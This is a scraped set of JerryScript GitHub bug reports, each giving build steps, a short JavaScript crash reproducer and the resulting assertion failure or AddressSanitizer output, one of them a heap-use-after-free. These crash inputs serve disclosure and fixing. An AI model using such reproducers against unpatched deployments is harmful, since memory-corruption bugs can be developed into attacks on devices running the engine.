#10 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#11 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#12 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#13 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#14 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#15 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#16 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#17 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#18 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#19 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#20 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#21 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#22 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#23 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#24 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#25 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#26 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#27 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#28 0x80f9aff in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:339
#29 0x804def4 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:579
previously allocated by thread T0 here:
#0 0xf7abe144 in __interceptor_realloc (/usr/lib32/libasan.so.2+0x97144)
#1 0x80c2bfe in jmem_heap_realloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:674
#2 0x80eb507 in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:144
#3 0x80b412e in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:336
#4 0x8133ff7 in ecma_builtin_regexp_prototype_compile /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:323
#5 0x813455b in ecma_builtin_regexp_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:567
#6 0x808281d in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1216
#7 0x80829c3 in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1240
#8 0x8098e38 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:845
#9 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#10 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#11 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#12 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#13 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#14 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#15 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#16 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#17 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#18 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#19 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#20 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#21 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#22 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#23 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#24 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#25 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#26 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#27 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#28 0x80f9aff in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:339
#29 0x804def4 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:579
SUMMARY: AddressSanitizer: heap-use-after-free /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1344 ecma_bytecode_ref
Shadow bytes around the buggy address:
0x3eca03b0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
0x3eca03c0: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd
0x3eca03d0: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa
0x3eca03e0: fd fd fd fa fa fa fd fd fd fd fa fa fd fd fd fa
0x3eca03f0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00
=>0x3eca0400: 00 fa fa fa[fd]fd fd fa fa fa fd fd fd fa fa fa
0x3eca0410: fd fd fd fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x3eca0420: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x3eca0430: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
0x3eca0440: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fd
0x3eca0450: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
==80830==ABORTING
```
Credits: This vulnerability is detected by chong from OWL337.
| heap-use-after-free in ecma_bytecode_ref | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4056/comments | 0 | 2020-07-25T14:58:50Z | 2020-07-28T08:47:38Z | https://github.com/jerryscript-project/jerryscript/issues/4056 | 665,599,573 | 4,056 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
class cla {
static
}
const instance = new cla();
```
###### Output
```
ICE: Assertion 'scope_stack_p > context_p->scope_stack_p' failed at /home/jerryscript/jerry-core/parser/js/js-scanner-util.c(scanner_literal_is_created):2598.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'scope_stack_p > context_p->scope_stack_p' in scanner_literal_is_created | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4055/comments | 0 | 2020-07-25T14:28:22Z | 2020-07-28T08:58:10Z | https://github.com/jerryscript-project/jerryscript/issues/4055 | 665,594,497 | 4,055 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
var obj = {
m() {super.8 = 17;},
};
assert.throws(() => obj.n.call(42), TypeError);
```
###### Output
```
ICE: Assertion 'last_opcode != PARSER_TO_EXT_OPCODE (CBC_EXT_PUSH_SUPER)' failed at /home/jerryscript/jerry-core/parser/js/js-parser-util.c(parser_flush_cbc):156.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'last_opcode != PARSER_TO_EXT_OPCODE (CBC_EXT_PUSH_SUPER)' in parser_flush_cbc | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4054/comments | 0 | 2020-07-25T14:16:57Z | 2020-07-27T17:38:20Z | https://github.com/jerryscript-project/jerryscript/issues/4054 | 665,592,724 | 4,054 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
Int8Array;
var ta = new Int8Array([1]);
function callback() {
var obj = {};
var proxy = new Proxy(obj, {
getOwnPropertyDescriptor: function (target, property) {
return { configurable: true, enumerable: true, value: 10 };
},
ownKeys: function (target) {
return ["Infinity", "Infinity"];
}
});
var proxy2 = new Proxy(proxy, {
getOwnPropertyDescriptor: function withPropertyDeleted(object, propertyName, callback) {
var descriptor = Object.getOwnPropertyDescriptors(object, propertyName);
},
ownKeys: function (target) {
return ["prop2", "prop3", Symbol("prop4"), Symbol("prop5")];
}
});
print(Object.keys(proxy2));
}
ta.every(callback);
```
###### Output
```
ICE: Assertion 'ecma_find_named_property (object_p, name_p) == NULL' failed at /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c(ecma_create_named_data_property):525.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'ecma_find_named_property (object_p, name_p) == NULL' in ecma_create_named_data_property | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4053/comments | 1 | 2020-07-25T13:56:25Z | 2020-07-27T09:38:06Z | https://github.com/jerryscript-project/jerryscript/issues/4053 | 665,589,517 | 4,053 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
Int8Array;
var ta = new Int8Array([1]);
function callback() {
var obj = {};
var proxy = new Proxy(obj, {
getOwnPropertyDescriptor: function (target, property) {
},
});
var proxy2 = new Proxy(proxy, {
a: obj.prop2++
});
Object.freeze(proxy);
}
ta.every(callback);
ta.filter(callback);
```
###### Output
```
ICE: Assertion '!jcontext_has_pending_exception ()' failed at /home/jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion '!jcontext_has_pending_exception ()' in jcontext_raise_exception | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4052/comments | 0 | 2020-07-25T13:28:44Z | 2020-07-27T17:38:59Z | https://github.com/jerryscript-project/jerryscript/issues/4052 | 665,585,532 | 4,052 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
function foo() {
for (let i = 0; i < 3; i++) {
const N = class { };
function bar(a0) {
}
}
}
foo();
```
###### Output
```
ICE: Assertion 'page_p != NULL' failed at /home/jerryscript/jerry-core/parser/js/js-parser-mem.c(parser_list_get):277.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'page_p != NULL' in parser_list_get | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4051/comments | 0 | 2020-07-25T13:02:56Z | 2020-07-28T08:55:14Z | https://github.com/jerryscript-project/jerryscript/issues/4051 | 665,581,845 | 4,051 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
function write([a] of { }
(function Test1() {
write("");
});
```
###### Output
```
ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1772.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' in parser_parse_function_arguments | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4050/comments | 0 | 2020-07-25T12:51:14Z | 2020-07-28T08:53:09Z | https://github.com/jerryscript-project/jerryscript/issues/4050 | 665,580,223 | 4,050 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
const foo = {x: 0};
foo.__proto__ = new Proxy({},{});
for (const x in foo) { }
```
###### Output
```
ICE: Assertion 'type == ECMA_OBJECT_TYPE_GENERAL' failed at /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_op_object_get_property_names):2312.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'type == ECMA_OBJECT_TYPE_GENERAL' in ecma_op_object_get_property_names | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4049/comments | 1 | 2020-07-25T12:35:10Z | 2020-07-27T13:38:43Z | https://github.com/jerryscript-project/jerryscript/issues/4049 | 665,577,944 | 4,049 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
Object.assign({}, RegExp);
```
###### Output
```
ICE: Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at /home/jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):107.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' in jmem_heap_finalize | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4048/comments | 0 | 2020-07-25T12:20:32Z | 2020-07-27T17:47:56Z | https://github.com/jerryscript-project/jerryscript/issues/4048 | 665,575,833 | 4,048 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
var f = new Proxy([], {});
f.sort();
```
###### Output
```
ICE: Assertion 'index != ECMA_STRING_NOT_ARRAY_INDEX' failed at /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c(ecma_builtin_array_prototype_object_sort):1101.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337.
| Assertion 'index != ECMA_STRING_NOT_ARRAY_INDEX' in ecma_builtin_array_prototype_object_sort | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4047/comments | 1 | 2020-07-25T12:09:14Z | 2020-07-27T13:39:07Z | https://github.com/jerryscript-project/jerryscript/issues/4047 | 665,574,326 | 4,047 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
```
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
```
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
let orig = {};
Object.defineProperty(orig, 'b', {
value: "asdf", enumerable: false
});
let newObj = Object.assign({}, orig);
```
###### Output
```
ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /home/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):75.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' in ecma_free_string_list | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4046/comments | 0 | 2020-07-25T12:02:25Z | 2020-07-27T17:47:56Z | https://github.com/jerryscript-project/jerryscript/issues/4046 | 665,573,353 | 4,046 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
var a = new Proxy(eval, {});
var b = {
y : 2
};
b.__proto__ = a;
var c = [];
var d = new Date();
d.__proto__ = b;
a.__proto__ = [];
c.__proto__ = d;
c;
var a1 = new String();
a1.__proto__ = c;
a1.__proto__ = [];
```
###### Output
```
ICE: Assertion '!ECMA_OBJECT_IS_PROXY (object_p)' failed at /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c(ecma_op_object_get_own_property):80.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion '!ECMA_OBJECT_IS_PROXY (object_p)' in ecma_op_object_get_own_property | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4045/comments | 0 | 2020-07-25T11:45:36Z | 2020-07-30T12:35:19Z | https://github.com/jerryscript-project/jerryscript/issues/4045 | 665,571,176 | 4,045 |
[
"jerryscript-project",
"jerryscript"
]
|
###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
var a = Int32Array.prototype;
a.__proto__ = [];
var b = a.splice(7, -4, 8, 9, 10);
b.__proto__ = a;
b.length = 5;
b = b.concat([]);
assert.areEqual('[0,"a1","a2",null,null]', JSON.stringify(b));
```
###### Output
```
ICE: Assertion 'ecma_is_value_true (put_comp)' failed at /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers.c(ecma_builtin_helper_array_concat_value):383.
Error: ERR_FAILED_INTERNAL_ASSERTION
Aborted (core dumped)
```
Credits: This vulnerability is detected by chong from OWL337. | Assertion 'ecma_is_value_true (put_comp)' in ecma_builtin_helper_array_concat_value | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4044/comments | 0 | 2020-07-25T11:26:36Z | 2020-07-28T08:45:51Z | https://github.com/jerryscript-project/jerryscript/issues/4044 | 665,568,490 | 4,044 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.